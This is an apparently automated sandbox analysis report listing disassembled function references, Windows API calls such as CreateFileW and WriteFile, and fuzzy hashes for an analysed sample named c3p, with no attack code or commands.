                                                    • DispatchMessageW.USER32(?), ref: 0040CE3F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Message$DispatchPeekTranslate
                                                    • String ID:
                                                    • API String ID: 4217535847-0
                                                    • Opcode ID: 3bcc0019167008ed6046610103470990902ffce4856a4c3d90b832063c98dd80
                                                    • Instruction ID: 32a85e4d4a826c9d45554aa75601f0bac722d611be20bb766d5c71021b96714b
                                                    • Opcode Fuzzy Hash: 3bcc0019167008ed6046610103470990902ffce4856a4c3d90b832063c98dd80
                                                    • Instruction Fuzzy Hash: 32E0ED72E0222AABCB20ABE5AC4CCDBBF6CEE062517404021BD05E2014E638D116C7F5
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00407FA2
                                                      • Part of subcall function 00401851: __EH_prolog.LIBCMT ref: 00401856
                                                      • Part of subcall function 00401851: _memset.LIBCMT ref: 00401999
                                                      • Part of subcall function 00401851: _memset.LIBCMT ref: 004019A8
                                                      • Part of subcall function 00401851: _memset.LIBCMT ref: 004019B7
                                                      • Part of subcall function 0040145F: __EH_prolog.LIBCMT ref: 00401464
                                                    • _wcscpy.LIBCMT ref: 00408041
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: H_prolog_memset$_wcscpy
                                                    • String ID: rar
                                                    • API String ID: 2876264062-1792618458
                                                    • Opcode ID: 5d3b9128a0cda9991b45ac0e1a56650690facc272257e9d69e79fa538dbc655e
                                                    • Instruction ID: 53bce053d24c49e1f6fcf424261482c96304109e3676d75e0d2a0acb115d3bfa
                                                    • Opcode Fuzzy Hash: 5d3b9128a0cda9991b45ac0e1a56650690facc272257e9d69e79fa538dbc655e
                                                    • Instruction Fuzzy Hash: E741A4319402589EDB20EB60C945BEA77B8AF14304F0408FFE48A77182DB795F88CB29
                                                    APIs
                                                    • __CxxThrowException@8.LIBCMT ref: 004122F1
                                                    • _malloc.LIBCMT ref: 0041230B
                                                      • Part of subcall function 0041CAFE: __FF_MSGBANNER.LIBCMT ref: 0041CB21
                                                      • Part of subcall function 0041CAFE: __NMSG_WRITE.LIBCMT ref: 0041CB28
                                                      • Part of subcall function 0041CAFE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00420EB4,00000000,00000001,00000000,?,0041EAED,00000018,0042D8B8,0000000C,0041EB7E), ref: 0041CB75
                                                    • _memset.LIBCMT ref: 0041235E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: AllocateException@8HeapThrow_malloc_memset
                                                    • String ID:
                                                    • API String ID: 3965744532-0
                                                    • Opcode ID: b6dab7f7b9b14b1c3dd6a49bb6a0dc6428f545d5e75d9d5cfda1de9083c9dada
                                                    • Instruction ID: ffd5469e8927a66b05899aa66e51adf59dc711c071ef3bb7ac8bf15c27b8a745
                                                    • Opcode Fuzzy Hash: b6dab7f7b9b14b1c3dd6a49bb6a0dc6428f545d5e75d9d5cfda1de9083c9dada
                                                    • Instruction Fuzzy Hash: B34104B0905748ABEB25DE38D9847DAB7D4AB14305F10486FE896D3241D7BCA9E0C71D
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0040B850,?,?,00000000,?,?,00412073,?,?,?,00000001), ref: 0040885C
                                                    • WriteFile.KERNEL32(00000001,?,00004000,?,00000000,?,?,0040B850,?,?,00000000,?,?,00412073,?,?), ref: 00408894
                                                    • WriteFile.KERNELBASE(00000001,?,00000001,?,00000000,?,?,?,?,?,0040B850,?,?,00000000,?,?), ref: 004088BE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$Handle
                                                    • String ID:
                                                    • API String ID: 4209713984-0
                                                    • Opcode ID: 8a72d7d9aea97a559a9e7ba6f4dcb7e4cfa17ec02cb55baa4c7163d4e8fa20d6
                                                    • Instruction ID: 05fe826ef37b03cd11afcdec12f62b331215059efb2e71ec0f12e3647d5e0f1d
                                                    • Opcode Fuzzy Hash: 8a72d7d9aea97a559a9e7ba6f4dcb7e4cfa17ec02cb55baa4c7163d4e8fa20d6
                                                    • Instruction Fuzzy Hash: 813181B2600504EFDF24EF65CA8497B77AAEB54310750C53EE596A7280DB38A9058B29
                                                    APIs
                                                      • Part of subcall function 00409E12: _wcslen.LIBCMT ref: 00409E18
                                                    • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,?,?,?,004091A6,?,00000001,00000000,?,?,?,?,?), ref: 00409081
                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,?,00000800,00000000,00000000,?,?,?,004091A6,?,00000001,00000000,?,?), ref: 004090B0
                                                    • GetLastError.KERNEL32(00000000,00000000,?,?,?,004091A6,?,00000001,00000000,?,?,?,?,?,?,004065CE), ref: 004090C9
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                    • String ID:
                                                    • API String ID: 2260680371-0
                                                    • Opcode ID: 227378bfe0dee5d36e4d509f5fb4af626e29390fe32d93a2db47539ae2859bb7
                                                    • Instruction ID: cf922ee7dd3167ab8cdc3191a550b1e98f982940cb6efb8051210f9b24962699
                                                    • Opcode Fuzzy Hash: 227378bfe0dee5d36e4d509f5fb4af626e29390fe32d93a2db47539ae2859bb7
                                                    • Instruction Fuzzy Hash: 5701F53511424565DB3167258C05BBB22589B85B84F48003BF980F62D7D77CDC8296BE
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 0040DFCD
                                                    • _wcscpy.LIBCMT ref: 0040DFED
                                                      • Part of subcall function 00410901: _wcslen.LIBCMT ref: 00410917
                                                      • Part of subcall function 00410901: _wcscpy.LIBCMT ref: 0041092D
                                                    • _wcscpy.LIBCMT ref: 0040E00B
                                                      • Part of subcall function 00406F1D: __EH_prolog.LIBCMT ref: 00406F22
                                                      • Part of subcall function 00406E41: __EH_prolog.LIBCMT ref: 00406E46
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: H_prolog_wcscpy$_wcslen
                                                    • String ID:
                                                    • API String ID: 2067596392-0
                                                    • Opcode ID: 2598a9dacd2fc00f060f7d24982327f35f9419a6a23a18333e7f943346b77831
                                                    • Instruction ID: 95f7b5c4b22bdb37da16cc03627ecbf5dedd8582a01dd8c00b17b30a5a14e483
                                                    • Opcode Fuzzy Hash: 2598a9dacd2fc00f060f7d24982327f35f9419a6a23a18333e7f943346b77831
                                                    • Instruction Fuzzy Hash: D4113A7550A294EED701EBA4E8427DD7BB0EB0A318F10406FF445622C2CFBD0A94CB6E
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID: CMT
                                                    • API String ID: 3519838083-2756464174
                                                    • Opcode ID: d986000c6ca72751efd8321b82c4a240df430e88f70e5c814bb4354efc552f5c
                                                    • Instruction ID: cb1905d03b2c7ebf80e1cc89add2cdc95a70797c28ece277fc4d9c4d8a9089db
                                                    • Opcode Fuzzy Hash: d986000c6ca72751efd8321b82c4a240df430e88f70e5c814bb4354efc552f5c
                                                    • Instruction Fuzzy Hash: 6B210571600544AFCB05EF2488909AEBBB8EF05314B00C06EF867773E2CB389E01CB69
                                                    APIs
                                                    • _realloc.LIBCMT ref: 0040115B
                                                      • Part of subcall function 00406381: __vswprintf_c_l.LIBCMT ref: 0040639F
                                                    Strings
                                                    • Maximum allowed array size (%u) is exceeded, xrefs: 0040112C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: __vswprintf_c_l_realloc
                                                    • String ID: Maximum allowed array size (%u) is exceeded
                                                    • API String ID: 620378156-979119166
                                                    • Opcode ID: dabfd28f0384f0a10da1ebac01ba713320d329a95fe551428d946b20711811d4
                                                    • Instruction ID: 6c4186d6b9390bb0c66afba1aeba82a7a6e9864d1fa2952356ac7bfb653a8b50
                                                    • Opcode Fuzzy Hash: dabfd28f0384f0a10da1ebac01ba713320d329a95fe551428d946b20711811d4
                                                    • Instruction Fuzzy Hash: 37018F353007066FD728AA26D89193BB3D9EB88764310443FE99B97792EA39BC508718
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: H_prolog_wcscpy
                                                    • String ID:
                                                    • API String ID: 2825759377-0
                                                    • Opcode ID: e265fad0a277a2867074866266f66ac0263633a1b2de895241266d78b8477993
                                                    • Instruction ID: 2ef6bc515ba2e0dc5db37b4040bb795630356917b528567fec6f9d7f401b2555
                                                    • Opcode Fuzzy Hash: e265fad0a277a2867074866266f66ac0263633a1b2de895241266d78b8477993
                                                    • Instruction Fuzzy Hash: B9A19170A00A84AFDB30DB74C8409AFBBE5AF45304F14496FE0A6E73A1D739AD41CB59
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,?,?,-00000011,?,0040850F,?,-00000011,?), ref: 0040873D
                                                    • CreateFileW.KERNEL32(?,000000FF,?,00000000,00000002,00000000,00000000,?,?,00000800,?,?,?,-00000011,?,0040850F), ref: 00408772
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 263cb73657301cb08f0e55ef8fe29f69456dde35c25ab48d854be6bf91b498c3
                                                    • Instruction ID: 29e4b0c4840c651442be05a52c5ac271f80886423710b7b6cc86d867a3c7bca3
                                                    • Opcode Fuzzy Hash: 263cb73657301cb08f0e55ef8fe29f69456dde35c25ab48d854be6bf91b498c3
                                                    • Instruction Fuzzy Hash: A521E171400708AEDB209F24CD41EEA7BA9EB04368F00853EF5D5A72D1CA799D999B58
                                                    APIs
                                                    • FlushFileBuffers.KERNEL32(?), ref: 00408AD7
                                                    • SetFileTime.KERNELBASE(?,00000000,00000000,00000000,?,?,?), ref: 00408B7E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: File$BuffersFlushTime
                                                    • String ID:
                                                    • API String ID: 1392018926-0
                                                    • Opcode ID: c0a9dcd713e695108bdd44a2682f9f95ae8a9b81f2a0c449d301f472b703d208
                                                    • Instruction ID: 7c12c14a7755126cd1b1099fbb01998f682996c6a8561fd0549d195c8dfa784e
                                                    • Opcode Fuzzy Hash: c0a9dcd713e695108bdd44a2682f9f95ae8a9b81f2a0c449d301f472b703d208
                                                    • Instruction Fuzzy Hash: B721C171600244AFCB11CF68C645BEE7BB4AF01300F18806EF895EB281DB78EA45CB58
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00401337
                                                      • Part of subcall function 00402C53: __EH_prolog.LIBCMT ref: 00402C58
                                                    • _wcslen.LIBCMT ref: 004013D9
                                                      • Part of subcall function 0041A086: __lock.LIBCMT ref: 0041A0A4
                                                      • Part of subcall function 0041A086: ___sbh_find_block.LIBCMT ref: 0041A0AF
                                                      • Part of subcall function 0041A086: ___sbh_free_block.LIBCMT ref: 0041A0BE
                                                      • Part of subcall function 0041A086: RtlFreeHeap.NTDLL(00000000,00000000,0042D5E0,0000000C,0041EB44,00000000,0042D8B8,0000000C,0041EB7E,00000000,0041A52B,?,00425008,00000004,0042DAA0,0000000C), ref: 0041A0EE
                                                      • Part of subcall function 0041A086: GetLastError.KERNEL32(?,00425008,00000004,0042DAA0,0000000C,00420EFE,00000000,0041A53A,00000000,00000000,00000000,?,0041E526,00000001,00000214), ref: 0041A0FF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: H_prolog$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lock_wcslen
                                                    • String ID:
                                                    • API String ID: 2367413355-0
                                                    • Opcode ID: ece96df32082121baa4e32b095fd113274a391476e9b0918afb84b839909b58d
                                                    • Instruction ID: dc97035477e96816ceb155d1a7472f3588848a77665ef8f5161077bfe03452da
                                                    • Opcode Fuzzy Hash: ece96df32082121baa4e32b095fd113274a391476e9b0918afb84b839909b58d
                                                    • Instruction Fuzzy Hash: B321A131C0021AEBDF21AF95D801AEEBBB5EF09704F10802FF951B26A1C7394952DF99
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 0040E44E
                                                      • Part of subcall function 00401851: __EH_prolog.LIBCMT ref: 00401856
                                                      • Part of subcall function 00401851: _memset.LIBCMT ref: 00401999
                                                      • Part of subcall function 00401851: _memset.LIBCMT ref: 004019A8
                                                      • Part of subcall function 00401851: _memset.LIBCMT ref: 004019B7
                                                      • Part of subcall function 00401797: __EH_prolog.LIBCMT ref: 0040179C
                                                    • _malloc.LIBCMT ref: 0040E4B6
                                                      • Part of subcall function 0041CAFE: __FF_MSGBANNER.LIBCMT ref: 0041CB21
                                                      • Part of subcall function 0041CAFE: __NMSG_WRITE.LIBCMT ref: 0041CB28
                                                      • Part of subcall function 0041CAFE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00420EB4,00000000,00000001,00000000,?,0041EAED,00000018,0042D8B8,0000000C,0041EB7E), ref: 0041CB75
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: H_prolog_memset$AllocateHeap_malloc
                                                    • String ID:
                                                    • API String ID: 47157355-0
                                                    • Opcode ID: c2279c2661c52e5bc04406100971ad100f30232522f7b6eca3b58c110daf14ee
                                                    • Instruction ID: 6264913a76ec869d2d2fa857a6352ea683c0897fa8fb429f1b845d37f4e95463
                                                    • Opcode Fuzzy Hash: c2279c2661c52e5bc04406100971ad100f30232522f7b6eca3b58c110daf14ee
                                                    • Instruction Fuzzy Hash: 77213D72901218EBCF11EF96D8819EEBBB4BF49308F10456FE506B3391D7385A54CB69
                                                    APIs
                                                    • SetFilePointer.KERNELBASE(?,00000000,?,00000001), ref: 00408969
                                                    • GetLastError.KERNEL32(?,?), ref: 00408976
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastPointer
                                                    • String ID:
                                                    • API String ID: 2976181284-0
                                                    • Opcode ID: 5947e9dc9062b13b14b755b9ca28fd0d3e60ad3149634ad75383f6cf314797db
                                                    • Instruction ID: de43bb50fe4534e4eccb001886877135c10a45c62ef5b42f5ae08e6f60a1f5c5
                                                    • Opcode Fuzzy Hash: 5947e9dc9062b13b14b755b9ca28fd0d3e60ad3149634ad75383f6cf314797db
                                                    • Instruction Fuzzy Hash: E501F9B1701204BFD724AB798E4297B36ADDB84334714423FB592E33C1DA789D0152AB
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: LoadString
                                                    • String ID:
                                                    • API String ID: 2948472770-0
                                                    • Opcode ID: e3f0d2c0301668cb52b7570c93dd023f7b3c7b3dac79d8733f99470b967e0d9a
                                                    • Instruction ID: a83cdb128feff8810628ead96f3a2cb9bc7cb8109f271ce783376fdc77cd7c0f
                                                    • Opcode Fuzzy Hash: e3f0d2c0301668cb52b7570c93dd023f7b3c7b3dac79d8733f99470b967e0d9a
                                                    • Instruction Fuzzy Hash: 53018132601214BFDA209B65AD85F577A9DDFCA350F10443EB610E32B1DA749C51876C
                                                    APIs
                                                    • SetFilePointer.KERNELBASE(?,?,00000001,00000001,?,?,?,?,00408D59,00000001,00000001,00000000,?,00407B60,?,?), ref: 00408D26
                                                    • GetLastError.KERNEL32(00408D59,00000001,00000001,00000000,?,00407B60,?,?,?,?,?,?,?,?,00000000,?), ref: 00408D32
                                                      • Part of subcall function 00408B8B: __EH_prolog.LIBCMT ref: 00408B90
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileH_prologLastPointer
                                                    • String ID:
                                                    • API String ID: 4236474358-0
